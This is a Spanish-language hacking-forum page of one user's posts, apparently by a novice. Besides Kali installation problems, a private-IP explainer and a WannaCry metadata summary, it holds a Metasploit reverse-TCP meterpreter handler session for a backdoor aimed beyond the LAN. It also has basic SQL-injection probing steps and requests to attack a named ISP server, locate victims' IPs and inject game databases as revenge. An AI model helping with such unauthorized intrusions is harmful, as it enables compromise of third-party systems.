Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Tharx_

#1
Buenas, la verdad que tengo el internet un poco lento y disculpen los estilos del tema.

Es simplemente esto, a ver si me pueden ayudar con alguna Tools, si se puede realizar por medio de mi laptop o necesito un radio comunicador, estoy en una zona donde es lo que más se utiliza son los radio comunicadores. La verdad me interesaría, son frecuencias encriptadas y algunas libres, por la ingeniería social que he aplicado sé que son algunas encriptadas y otras libres, son al rededor de 8 radio frecuencias en un diámetro de 8km y todas se pueden escanear desde mi posicion. La verdad quisiera saber y así aprender un poco más.

Gracias por la ayuda.
#2
Moriré con esto ajaja
Código: php

<span>
Usuarios Online:
<strong>
  @foreach($users as $user)
   @if($user->isOnline())
    <?php
     $arrayUserCount = array($user->id);
     $userCount = count($arrayUserCount);
                               
     var_dump($arrayUserCount[0]);
    ?>
   @endif
  @endforeach
</strong>
</span>


Tengo un problema con mi código, al yo colocar el foreach me permite iniciar la clase $user->isOnline(), pero realiza OBVIAMENTE el array por cada usuario Online, lo que yo quiero es que genere un array de los usuarios online, sin necesidad de realizar el foreach para iniciar la clase. ¿Cómo puedo iniciar la clase isOnline() sin necesidad de utilizar el foreach para que así me de un solo array de los usuarios online, no un array por cada usuario online

#4
Tengo una pregunta: ¿por qué será que los dispositivos claramente que le corren el windows no se conectan a mi dispositivo? Cuando veo un tutorial en pdf a ellos le aparecen los dispositivos que se quieren conectar a su notebook o como sea, pero a mi no me sale. Aqui dejo el codigo que me sale, aun usando TheFatRat que creo el backdoor ejecutable y cuando termino todo me voy a usar el metasploit y no me sale nada, yo he abierto los puertos y utlizo ngrok para darle un ataque fuera de LAN pero me da un error no se si ando viendo tutoriales y libros de versiones anteriores y eso afecte en algo ¿que me recomiendan?

root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~/Escritorio/TheFatRat/output# cd
root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~# msfconsole
                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ]

msf > use multi/handler
msf exploit(handler) > use payload windows/meterpreter/reverse_tcp
[-] Failed to load module: payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > sset lhost 192.168.1.103
[-] Unknown command: sset.
msf exploit(handler) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.103    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
  • Exploit running as background job 0.

  • Started reverse TCP handler on 192.168.1.103:8080

    root@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:~#[/glow]
#5
¿Que es una dirección IP Privada?

Existen ciertas direcciones en cada clase de dirección IP que no están asignadas a IP's publicas son las utilidadas como direcciones privadas.

Las direcciones IP privadas son las que se suelen utilizar dentro de una red, su uso es muy general, se utiliza en casa para conectar todos los dispositivos a internet, tambien se usa en compañías de cualquier tamaño, proveedores de internet (ISP), dispositivos IOT.

    En una misma red no pueden existir dos direcciones privadas iguales, pero sí se pueden repetir en dos redes privadas que no tengan conexión entre sí o que se conecten mediante el protocolo NAT.

¿Cuales son las direcciones privadas de una red?

Clase   Rango   Nº Redes

A   10.0.0.0 a 10.255.255.255   8 bits red 24 bits hosts

B   172.16.0.0 a 172.31.255.255   16 bits red 16 bits hosts.

16 redes clase B contiguas

C   192.168.0.0 a 192.168.255.255   24 bits red 8 bits hosts.

256 redes clase C continuas


Preguntas frecuentes sobre las IP

¿Que es un RIR?

    Un RIR supervisa la asignación y registro de los números de recursos de Internet (direcciones IPv4, direcciones IPv6 y números de Sistemas Autónomos) en una región
específica.

¿Que es ARIN?

    Es el American Registry for Internet Numbers, es el Registro Regional de Internet (RIR) para América Anglosajona, varias islas de los océanos Pacífico y Atlántico.

¿Que es RIPE NCC?

    Es el Réseaux IP Européens Network Coordination Centre (Centro de Coordinación de redes IP europeas), es el Registro Regional de Internet (RIR) para Europa, Oriente Medio y partes de Asia Central.

¿Que es APNIC?

    Es el Asia-Pacific Network Information Centre, es el Registro Regional de Internet (RIR) para Asia y la Región Pacífica.

¿Que es LACNIC?

    Es el Latin American and Caribbean Internet Address Registry, es el Registro Regional de Internet (RIR) para América Latina y el Caribe.

¿Que es AfriNIC?

    Es el African Network Information Centre, es el Registro Regional de Internet (RIR) para Africa.
#6
Estuve adentrando en Fluxion, pero quería instalar el Google Chrome entonces no pude instalar el chrome, pero a la hora de entrar en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta me aparece disque:

connecting  [www.dl.google.com/chrome/] entonces en un video vi que les salia connecting[www.kali.org]

Alguna respuesta?
#7
Cuando ando instalando (me ha pasado como 3 veces) el Kali linux de 32bits v2017.3 me sale unas cosas que mi hardware necesita unos firmware y yo le doy a (*Sí)pero no pasa nada, en cambio le doy (*No) y me sigue la instalación del Linux, pero a la hora de agregar el Grub porque tengo Windows e hice una partición para instalar Linux, pero cuando entro en Linux se me queda pegado y antes me decia de unos 154524/245225Blocks o algo por el estilo, entonces se me queda pegado allí y se achica la pantalla como para entrar al inicio de sesión pero ahi se queda pegado ¿alguna ayuda, mis amigos? Quiero entrar en linux pero asi no puedo, trato de descargar el de 64bits para ver si me va mejor
#8
Bueno, son motvos muy personales. Yo les agradecería si me ayudan, es un servidor de CANTV y la ip es de ipv4 192.10.10.252

Saludos, ahorita me veo imposibilitado porque no tengo internet y tengo que recurrir a un CyberCafé, y no tengo el Linux instalado si me pueden ayudar...

Gracias.
#9
Ok, aquí voy: He tenido un pequeñito problema con el Sqlinjection es que yo hago los primeros pasos:
1.- Colocar la (') para conocer si esa página es vulnerable a las inyecciones.
2.- Colocar el Order BY peeeeeero ahí está el problema, que cuando hago 120000000 intentos con esto miren: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta BY 1 me sigue apareciendo como si colocara la ('), coloco esta: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Order BY 1 y me aparece Not Found The requested URL was not found on this server. entonces no se que hacer y proceder, estoy haciendo el curso del usuario und3rcode y creo que es muy bueno como instructor.

Ayúdenme, siento que no puedo avanzar bueno literalmente no puedo avanzar. Help me. ~RainelU
#10
No pues nada, está dicho en la descripción... leeré todas sus ayudas. ;D

Kuimba'e pora, RainelU
#11
Buen@s dias/tardes/noches voy a ir directo al grano.

Bueno, en realidad tengo un problema al instalar wine, al poder instalarlo me va todo bien (aún no se ha ejecutado), pero a la hora de querer abrirlo: ~: wine xampp.exe me da este

Código: bash
wine xampp.exe please
wine: Formato EXE erróneo en Z:\root\xampp.exe.


Yo quisiera saber el cómo y por qué aparece esto, he visto muchos foros incluso los oficiales con la mayoría en inglés, he intentado con desistalar y volver a instalar wine pero no me da resultados. Si me pudiesen ayuda estaría guay.

Salu2,
~Rainel.
#12
Muy buenas, como estoy aqui nuevamente en la sección pues paso por aqui para poner bien en claro que ya sé qué hacer pero una de las primeras cosas para hacer algo con un script o malware o tirar una injection es ¿algún método para obtener la dirección IPv4 o en la que me pueda comunicar con esa PC? O sea, yo estoy siguiendo el curso de Roadd -que por cierto está demasiado bueno y ayuda mucho justo con el conocimiento-. Y pues quisiera saber si tienen algún tutorial o curso o libro que ensañase esto. Ya que esta seccion es de dudas y pedidos pues... Pido ayuda, ya que me parece muy estúpido utilizar What'sTheirIp o usar las paginas webs para esa tonteria, pues me parece muy lammer y pues yo quiero aprender, solo necesito el conocimiento de cómo se podría hacer y yo me encargo de investigar. Es simplemente que quiero tener ese conocimiento y de verdad tengo mucha curiosidad.

Salu2, Rainel.
#13

Esta es una pequeña reseña de lo que Chema Alonso dejó en su foro, link abajo.

Esta parte del análisis es de las más curiosas, ya que no solo tenemos la información de los metadatos de RTF y contamos también con los metadatos de los ficheros ZIP. En las versiones de WannaCry se utiliza un fichero ZIP para descargar el ransomware, y en él se almacena la fecha del último acceso con su propia zona horaria. Analizando las fechas del ZIP se puede concluir que:

    2017-04-27 17:25 (hora local del atacante): El atacante crea b.wnry, un fichero BMP en segundo plano y el r.wnry, que contiene el fichero "readme".

    2017-05-09 16:57: El atacante crea otro zip con herramientas para conectarse a la red Tor y negociar el rescate. Se descargaron en el sistema de archivos del atacante a las 16:57, 09/05/2017, hora local del atacante, y son empaquetados e introducidos en un nuevo zip, s.wnry.

    2017-05-10 01:16: El atacante crea en su sistema c.wnry, que contiene dominios onion de la red Tor y una cartera para bitcoins.

    2017-05-11 15:59: Crea r.wnry que contiene instrucciones de borrado.

    2017-05-11 16:47: Edita b.wnry.

    2017-05-11 20:11: Edita c.wnry de nuevo.

    2017-05-11 20:13: Introduce b.wnry en el zip y lo comprime con contraseña.

    2017-05-12 02:22: Añade los ficheros EXE: u.wnry y t.wnry. El atacante empaqueta y establece una contraseña. El payload de gusano está listo.

Teniendo en cuenta que cada vez que se infecta un equipo se accede al fichero ZIP para extraer el ransomware, y que las primeras infecciones fueron descubiertas en la zona de Tailandia sobre las UTC 00:00, entonces podemos asumir cuales serían las zonas GMT posibles, es decir, que dentro de ese mismo día fueran posteriores a la fecha de creación del ramsonware.


Fuente:
Código: php
http://www.elladodelmal.com/2017/06/al-creador-de-wannacry-es-fan-de-messi.html
#14
Buenas a todos! Nuevamente yo, he estado buscando mucho desde ayer con respecto al Kali por suerte encontré un pendrive Usb con los requerimientos de almacenamiento del Kali pero como estaba de curioso y sí, mucha curiosidad. Entonces lo que hice fue poner el Hard Disk en modo dinámico pero ahora para meter el Kali en el Hard Disk (C:) pues tengo que ponerlo en básico, de verdad quiero cambiarlo para que pues me pueda entrar y guardarse en la partición que he hecho pero como tengo entendido que cuando está en dinámico ninguna partición pues de hace activa o healthy y pues no tendremos el espacio libre. ¿Alguna respuesta para esto?
#15
Muy buenas personas, hoy tengo una duda acerca de la instalación de este (OS). He decidido aprender a tener un hacking ético a través de los distintos cursos de este foro, pero lo que se me limita un poco es el tener un Operative System (OS) muy limitado como lo es windows, me he decidido descargar el Kali Linux junto con un torrent de instalacion pero me aparece un error o no se que sea, la verdad es que soy nuevo en esto, pero el error como los voy a estar dejando en las imágenes siguientes:

Este lo que podemos ver es el torrent que he descargado de Kali la pagina Oficial, pero al ponerlo en el utorrent todo bien pero al estar todo ya descargado.

Pero al clickear aparece esto. PD: No se si coincide en algo con mi ordenador, tengo un OS de 32bits y ese Kali es de 64bits. Disculpen pero nuevamente digo que soy un poco sin conocimiento y pues, cada dia uno aprende más :P :-[
#16
¡Buenas Gente Hermosa!, ¿Alguna vez no jugaron un servidor que tiene un GM  (Game Mode = Modo de Juego) Base SQL que los ha timado?.

Pues, este Post es para poner una clara y precisa parte de como Inyectar un servidor o Base de Datos (Como quieras llamarle), que quieras hacer justicia en tí. Pues, aquí compartiremos nuestros Aportes, la verdad no se mucho de esto pero quisiera aprender de ustedes ya que en realidad esta Comunidad tiene mucho que dar, soy Nuevo y quisiera aprender más pues hay una guía de Hacking y Craking desde 0 (La Recomiendo es de Roadd) y pues, espero ver sus respuestas sobre ¿Como inyectastes la Base de Datos? ¿Que programa usas? ¿Lo Scripteastes? ¿Qué? jaja.

Espero ver sus Respuestas. Quisiera aprender de ustedes :D
#17
Buenas Personas de Underc0de

Tengo un pequeño problema, me descargue el Avast Premium 2016 y Resulta tengo un Virus que se le accede a el Navegador y me pone en vez de Google pone "Terra" Quisiera saber como puedo sacarlo y qué necesito usar.


Aparte!! ¿Cómo se si tengo un Troyano?

Gracias Grandiosa Comunidad! Espero me ayuden con el Post